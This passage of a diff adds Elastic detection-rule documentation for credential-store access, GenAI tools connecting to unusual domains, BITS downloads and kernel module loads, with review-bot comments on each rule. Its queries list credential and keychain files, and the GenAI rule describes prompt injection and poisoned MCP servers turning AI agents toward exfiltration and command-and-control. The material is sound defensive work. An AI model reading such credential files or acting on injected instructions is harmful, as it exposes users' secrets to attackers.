"login.keychain-db", + "System.keychain", + "credentials.db", + "credentials", + "access_tokens.db", + "accessTokens.json", + "azureProfile.json", + "RDCMan.settings", + "known_hosts", + "KeePass.config.xml", + "Unattended.xml") + ) and not ( + host.os.type == "windows" and + process.name : ("claude.exe", "Claude") and + file.path : ("?:\\Users\\*\\AppData\\Roaming\\Claude\\Local State", + "?:\\Users\\*\\AppData\\Local\\Packages\\Claude_*\\LocalCache\\Roaming\\Claude\\Local State") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: 
+** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc new file mode 100644 index 0000000000..d252c547b3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc 
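Review bot: The description states that access to `.ssh/id_*` indicates harvesting, but the `file.name like~ (...)` list in the rule query contains no SSH private-key names at all, only `known_hosts`, so that sentence is not backed by the query; either add the usual key names to the list, for example `"id_rsa", "id_ed25519", "id_ecdsa",`, or drop the SSH-key reference from the description. Likewise `.aws/credentials` is matched only through the bare name `"credentials"`, which also fires on any unrelated file of that name, and the *False positive analysis* section could say so. The Linux caveat ("only creation events are available") appears only in the description; repeating it in the guide's *False positive analysis* would reach analysts who open the guide first.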
@@ -0,0 +1,152 @@ +[[prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain]] +=== GenAI Process Connection to Unusual Domain + +Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.network* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://atlas.mitre.org/techniques/AML.T0086 +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security +* https://specterops.io/blog/2025/11/21/an-evening-with-claude-code + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM +* Mitre Atlas: T0086 + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GenAI Process Connection to Unusual Domain* + + +GenAI tools with network access can be weaponized to contact attacker infrastructure for C2, data exfiltration, or payload retrieval. Compromised MCP servers, malicious plugins, or prompt injection attacks can redirect AI agents to connect to arbitrary domains. While legitimate GenAI tools connect to vendor APIs and CDNs, connections to unusual domains may indicate exploitation. 
+ + +*Possible investigation steps* + + +- Review the destination domain to determine if it's a legitimate GenAI service, CDN, package registry, or potentially malicious infrastructure. +- Investigate the GenAI process command line and configuration to identify what triggered the connection (plugin, MCP server, user prompt). +- Check if the domain was recently registered, uses a suspicious TLD, or has a low reputation score in threat intelligence feeds. +- Review the timing and context of the connection to determine if it correlates with user activity or was automated. +- Examine network traffic to and from the domain to identify the nature of the communication (API calls, file downloads, data exfiltration). +- Check for other hosts in the environment connecting to the same domain to determine if this is an isolated incident. +- Investigate whether the GenAI tool's configuration files were recently modified to add new MCP servers or plugins. +- Correlate with file events to see if the GenAI tool downloaded or created files around the same time as the connection. + + +*False positive analysis* + + +- GenAI tools may connect to new domains as vendors update their infrastructure, CDNs, or API endpoints. +- Package managers (npm, pip) used by MCP servers may connect to package registries for dependency resolution. +- Legitimate MCP servers and AI plugins connect to their respective backend services. +- Developer workflows testing new AI integrations or MCP servers will naturally trigger alerts for novel domain connections. + + +*Response and remediation* + + +- If the domain is confirmed malicious, block it at the network level and investigate the source of the compromise. +- Review the GenAI tool's configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection. +- Investigate any data that may have been sent to the suspicious domain and assess the potential for data exfiltration. 
+- Review and rotate any API keys, tokens, or credentials used by the GenAI tool. +- Update detection rules to monitor the identified domain across all hosts in the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:network and host.os.type:macos and event.action:connection_attempted and +( + process.name:( + Claude or "Claude Helper" or "Claude Helper (Plugin)" or Copilot or Cursor or + "Cursor Helper" or "Cursor Helper (Plugin)" or GPT4All or Jan or "Jan Helper" or + KoboldCpp or "LM Studio" or Ollama or Windsurf or "Windsurf Helper" or + "Windsurf Helper (Plugin)" or bunx or claude or codex or copilot or cursor or deno or + gemini-cli or genaiscript or gpt4all or grok or jan or koboldcpp or llama-cli or + llama-server or lmstudio or npx or ollama or pnpm or qwen or textgen or windsurf or yarn + ) or + (process.name:(node or node.exe) and process.command_line:(*openclaw* or *moltbot* or *clawdbot*)) +) and destination.domain:(* and not ( + aka.ms or anthropic.com or atlassian.com or cursor.com or cursor.sh or github.com or + gpt4all.io or hf.co or huggingface.co or lmstudio.ai or localhost or ollama.ai or + ollama.com or openai.com or *.aka.ms or *.akamaized.net or *.amazonaws.com or + *.amplitude.com or *.anthropic.com or *.atlassian.com or *.aws.amazon.com or + *.azure.com or *.cdn.cloudflare.net or *.cloudflare-dns.com or *.cloudflare.com or + *.cloudflarestorage.com or *.codeium.com or *.cursor.com or *.cursor.sh or + *.datadoghq.com or *.elastic-cloud.com or *.elastic.co or *.exp-tas.com or + *.gemini.google.com or *.generativelanguage.googleapis.com or *.github.com or + *.githubcopilot.com or *.githubusercontent.com or *.gitkraken.com or *.gitkraken.dev or + *.google.com or *.googleapis.com or *.gpt4all.io or *.grok.x.ai or *.hf.co or + *.honeycomb.io or *.huggingface.co or *.intercom.io or *.jan.ai or *.launchdarkly.com or + *.lmstudio.ai or *.microsoft.com or *.mixpanel.com or *.msedge.net or 
*.npmjs.com or + *.npmjs.org or *.ollama.ai or *.ollama.com or *.openai.com or *.pypi.org or + *.r2.cloudflarestorage.com or *.segment.io or *.sentry.io or *.visualstudio.com or + *.vsassets.io or *.vscode-cdn.net or *.windsurf.ai or *.x.ai or *.yarnpkg.com or + *.cartocdn.com or *.chatgpt.com or *.claude.ai or *.claude.com or + *.claudeusercontent.com or *.ggpht.com or *.gstatic.com or *.googleusercontent.com or + *.launchpadcontent.net or *.pythonhosted.org or *.recaptcha.net or *.shields.io or + *.snapcraftcontent.com or *.snapcraft.io or *.stripe.com or *.travis-ci.com or + *.travis-ci.org or *.ubuntu.com or *.ytimg.com or + *.github.io or *.githubassets.com or *.jsdelivr.net or *.nodesource.com or + chatgpt.com or claude.ai or claude.com or flagcdn.com or gitlab.com or + opencollective.com or pypi.org +)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc new file mode 100644 index 0000000000..5be1620cbe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc 
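Review bot: The exclusion list inside `destination.domain:(* and not (...))` removes entire multi-tenant hosting domains such as `*.amazonaws.com`, `*.cloudflarestorage.com`, `*.r2.cloudflarestorage.com`, `*.github.io` and `*.githubusercontent.com`, so a first-seen connection to any tenant on those services never becomes a new term; that is a coverage gap the *Investigating* paragraph should state explicitly so analysts know to hunt those destinations separately rather than assume the rule covers them. The process list also matches generic runtimes and package managers (`npx`, `bunx`, `pnpm`, `yarn`, `deno`) on name alone, whereas `node` is gated on `process.command_line`; if that asymmetry is intentional a short comment in the query would help, otherwise gating them the same way would reduce noise from ordinary development work on macOS.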
@@ -0,0 +1,115 @@
+[[prebuilt-rule-8-19-18-ibm-qradar-external-alerts]]
+=== IBM QRadar External Alerts
+
+Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app.
+
+*Rule type*: query
+
+*Rule indices*:
+
+* logs-ibm_qradar.offense-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 1m
+
+*Searches indices from*: now-2m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 1000
+
+*References*:
+
+* https://docs.elastic.co/en/integrations/ibm_qradar
+
+*Tags*:
+
+* Data Source: IBM QRadar
+* Use Case: Threat Detection
+* Resources: Investigation Guide
+* Promotion: External Alerts
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating IBM QRadar External Alerts*
+
+
+IBM QRadar is a Security Intelligence Platform that provides SIEM, log management, anomaly detection, and incident forensics. The rule promotes QRadar offense records as Elastic detection alerts, enabling analysts to investigate potential threats with full offense context including rule names, severity, and status.
+
+
+*Possible investigation steps*
+
+
+- Review the offense details including rule name, description, and categories to understand the nature of the alert.
+- Examine the offense severity and status (OPEN, HIDDEN, etc.) to prioritize investigation.
+- Cross-reference the offense with QRadar console for additional context including contributing events and log sources.
+- Investigate source and destination networks, device count, and event count associated with the offense.
+- Consult the IBM QRadar investigation guide and resources tagged in the alert for specific guidance on handling similar threats.
+
+
+*False positive analysis*
+
+
+- Offenses triggered by routine administrative activities or known maintenance can be false positives. Review the offense context and create exceptions for scheduled activities.
+- Legitimate security testing or penetration testing may generate offenses. Coordinate with security teams to whitelist these during scheduled tests.
+- Low-severity offenses from specific rules that are known to produce noise can be excluded by creating rule exceptions.
+- Offenses from development or test environments may not require investigation. Consider excluding these environments if appropriate.
+
+
+*Response and remediation*
+
+
+- Isolate affected systems if malicious activity is confirmed to prevent lateral movement.
+- Review the offense details to identify compromised accounts, credentials, or systems and take appropriate remediation steps.
+- Apply relevant security patches or updates to address any exploited vulnerabilities.
+- Escalate to the security operations center (SOC) or incident response team for further analysis if the threat appears significant.
+- Document the incident and update detection logic or exceptions based on findings.
+
+
+==== Setup
+
+
+
+*Setup*
+
+
+
+*IBM QRadar Offense Integration*
+
+This rule is designed to capture offense events generated by the IBM QRadar integration and promote them as Elastic detection alerts.
+
+To capture IBM QRadar offenses, install and configure the IBM QRadar integration to ingest offense records into the `logs-ibm_qradar.offense-*` index pattern.
+
+If this rule is enabled alongside the External Alerts promotion rule (UUID: eb079c62-4481-4d6e-9643-3ca499df7aaa), you may receive duplicate alerts for the same QRadar events. Consider adding a rule exception for the External Alert rule to exclude data_stream.dataset:ibm_qradar.offense to avoid receiving duplicate alerts.
+
+
+*Additional notes*
+
+
+For information on troubleshooting the maximum alerts warning please refer to this https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts[guide].
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.kind: alert and data_stream.dataset: ibm_qradar.offense
+
+----------------------------------
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc
new file mode 100644
index 0000000000..9bcb0804ed
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc
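Review bot: The query `event.kind: alert and data_stream.dataset: ibm_qradar.offense` promotes every offense document regardless of offense status, so if the integration writes a new document when an existing offense is updated (status change, additional contributing events — not visible in this patch), a single QRadar offense will surface as several Elastic alerts; the *False positive analysis* section should say so and point analysts to the status values the guide already mentions (OPEN, HIDDEN, etc.) as a tuning handle. The duplicate-alert warning about the External Alerts rule (UUID eb079c62-4481-4d6e-9643-3ca499df7aaa) lives only under *Setup*; a one-line pointer to it under *False positive analysis* would place it where analysts triaging duplicates look first.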
@@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits]] +=== Ingress Transfer via Windows BITS + +Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1197/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 12 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Ingress Transfer via Windows BITS* + + +Windows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer. + +This rule identifies such abuse by monitoring for file renaming events involving "svchost.exe" and "BIT*.tmp" on Windows systems. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ + +*Possible investigation steps* + + +- Gain context into the BITS transfer. + - Try to determine the process that initiated the BITS transfer. + - Search `bitsadmin.exe` processes and examine their command lines. + - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs. + - Try to determine the origin of the file. + - Inspect network connections initiated by `svchost.exe`. + - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events. + - Velociraptor can be used to extract these entries using the https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/[bitsadmin artifact]. + - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services. + - Check if the domain is newly registered or unexpected. + - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment. + - https://github.com/fireeye/BitsParser[BitsParser] can be used to parse BITS database files to extract BITS job information. +- Examine the details of the dropped file, and whether it was executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the involved executables using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + + +*False positive analysis* + + +- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files. + + +*Related Rules* + + +- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f +- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026 +- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9 + + +*Response and Remediation* + + +- Initiate the incident response process based on the outcome of the triage. 
+ - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action == "rename" and + process.name : "svchost.exe" and file.Ext.original.name : "BIT*.tmp" and + (file.extension : ("exe", "zip", "rar", "bat", "dll", "ps1", "vbs", "vbe", "wsh", "wsf", "sct", "js", "jse", "hta", "pif", "scr", "cmd", "cpl") or + file.Ext.header_bytes : "4d5a*") and + + /* noisy paths, for hunting purposes you can use the same query without the following exclusions */ + not file.path : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\*", "?:\\ProgramData\\*\\*") and + + /* lot of third party SW use BITS to download executables with a long file name */ + not length(file.name) > 30 and + not file.path : ( + "?:\\Users\\*\\AppData\\Local\\Temp*\\wct*.tmp", + "?:\\Users\\*\\AppData\\Local\\Adobe\\ARM\\*\\RdrServicesUpdater*.exe", + "?:\\Users\\*\\AppData\\Local\\Adobe\\ARM\\*\\AcroServicesUpdater*.exe", + "?:\\Users\\*\\AppData\\Local\\Docker Desktop Installer\\update-*.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: BITS Jobs +** ID: T1197 +** Reference URL: https://attack.mitre.org/techniques/T1197/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc new file mode 100644 index 0000000000..b6a2472045 --- /dev/null 
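Review bot: The *False positive analysis* section lists only "legitimate software and system updates", while the query itself carries two deliberate tuning decisions in comments (the `/* noisy paths ... */` path exclusions and `not length(file.name) > 30`); a sentence in the guide stating that these exclusions are intentional, and that the comment's "same query without the following exclusions" is the recommended hunting variant, would save analysts from re-deriving that from the query. The headings `*Response and Remediation*` and `*Related Rules*` differ in capitalization from `*Response and remediation*` used by the other rule documents in this patch; aligning them keeps the generated docs consistent.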
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc 
@@ -0,0 +1,179 @@ +[[prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location]] +=== Kernel Module Load from Unusual Location + +This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Threat: Rootkit +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Kernel Module Load from Unusual Location* + + +This rule detects attempts to load Linux kernel modules from atypical directories, which can indicate an attacker trying to run code in kernel space for stealth and long-term persistence. Adversaries often drop a malicious `.ko` into writable paths like `/tmp` or `/dev/shm` after initial access, then use `insmod` or `modprobe` to insert it and hide processes, files, or network activity as a rootkit. 
+ + +*Possible investigation steps* + + +- Capture the full command line and resolve any referenced `.ko` path, then collect the module file for hashing and static analysis to determine provenance and known-malware matches. +- Confirm whether the module is currently loaded by querying `lsmod`/`/proc/modules`, then map it to its on-disk location with `modinfo -n ` (or `/sys/module//sections/*`) to validate it was loaded from the suspicious directory. +- Review recent kernel and audit telemetry (`dmesg`, `/var/log/kern.log`, `journalctl -k`, and any audit records) around the event time for insertion messages, signature/taint indicators, and any follow-on errors suggesting tampering. +- Identify the initiating user/session and execution chain (parent process tree, TTY/SSH source, container context), then determine whether the action aligns with legitimate admin activity or coincides with other compromise signals on the host. +- Hunt for persistence and repeatability by checking for recurring module-load attempts and inspecting boot-time and scheduled execution paths (systemd units, init scripts, cron, rc.local) that could reload the module after reboot. + + +*False positive analysis* + + +- A system administrator or automated maintenance workflow may build or test an out-of-tree kernel module and load it with `insmod`/`modprobe` from a staging directory such as `/tmp`, `/root`, or `/mnt` before installing it into standard module paths. +- A legitimate bootstrapping or recovery operation may load a required driver module from nonstandard media or temporary runtime locations (e.g., `/boot`, `/run`, `/var/run`, or `/mnt`) during troubleshooting, initramfs/early-boot tasks, or mounting encrypted/storage devices. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network and disable external access (e.g., revoke SSH keys or block inbound SSH) to prevent additional module loads or lateral movement while preserving evidence. 
+- If the suspicious module is currently loaded, record `lsmod` and `modinfo` output, then unload it where safe (`modprobe -r `/`rmmod `) and quarantine the corresponding `.ko` from the unusual path (e.g., `/tmp`, `/dev/shm`, `/home`, `/mnt`) for hashing and malware analysis. +- Remove persistence mechanisms that would reload the module by deleting or disabling any related systemd units, init scripts, cron entries, and boot-time hooks, and validate `/etc/modules-load.d/`, `/lib/modules/$(uname -r)/`, and `depmod` outputs for unauthorized additions. +- Recover the host by restoring known-good kernel/module packages and rebuilding the initramfs, then reboot and verify no unexpected modules remain in `/proc/modules` and no new load attempts occur from writable directories. +- Escalate immediately to IR/forensics and consider full host rebuild if the module is unsigned/unknown, the kernel is tainted, module removal fails, or post-reboot evidence indicates stealth behavior consistent with a rootkit. +- Harden by restricting module loading (enable Secure Boot/module signature enforcement where supported, set `kernel.modules_disabled=1` after boot on fixed-function systems, and limit `CAP_SYS_MODULE` to trusted admins), and enforce file integrity monitoring/permissions to prevent `.ko` creation in world-writable locations. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. 
+ + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( + (process.name == "kmod" and process.args == "insmod" and process.args like~ "*.ko*") or + (process.name == "kmod" and process.args == "modprobe" and not process.args in ("-r", "--remove")) or + (process.name == "insmod" and process.args like~ "*.ko*") or + (process.name == "modprobe" and not process.args in ("-r", "--remove")) +) and ( + process.working_directory like ( + "/tmp*", "/var/tmp*", "/dev/shm*", "/run*", "/var/run*", "/home*/*", "/root*", + "/var/www*", "/boot*", "/srv*", "/mnt*", "/media*" + ) or + process.parent.working_directory like ( + "/tmp*", "/var/tmp*", "/dev/shm*", "/run*", "/var/run*", "/home*/*", "/root*", + "/var/www*", "/boot*", "/srv*", "/mnt*", "/media*" + ) or + process.args like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/run/*", "/var/run/*", "/home/*/*", "/root/*", + "/var/www/*", "/boot/*", "/srv/*", "/mnt/*", "/media/*", "./*" + ) +) and +not ( + process.parent.executable == "/usr/bin/podman" or + process.working_directory like "/tmp/newroot" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Rootkit +** ID: T1014 +** Reference URL: https://attack.mitre.org/techniques/T1014/ 
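Review bot: The command examples in "Possible investigation steps" and "Response and remediation" have lost their module-name placeholder — `modinfo -n `, `/sys/module//sections/*` and `modprobe -r `/`rmmod ` are rendered with nothing after the option, most likely an angle-bracketed token that the asciidoc rendering swallowed. Replace them with a placeholder that survives rendering, e.g. `modinfo -n MODULE_NAME` and `/sys/module/MODULE_NAME/sections/*`, so the analyst is not handed an incomplete command. On the query side, the `modprobe` branches match any invocation without `-r`/`--remove` as long as `process.working_directory` (or the parent's) starts with one of the listed prefixes, so a `modprobe` run from an administrator's home directory that loads a module installed under `/lib/modules` will also fire; the "False positive analysis" section should say so, e.g. `- Administrators running modprobe from their home or /root directory will match on working directory alone even when the module resides in the standard module path.`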
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc
new file mode 100644
index 0000000000..28bbe0754b
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc
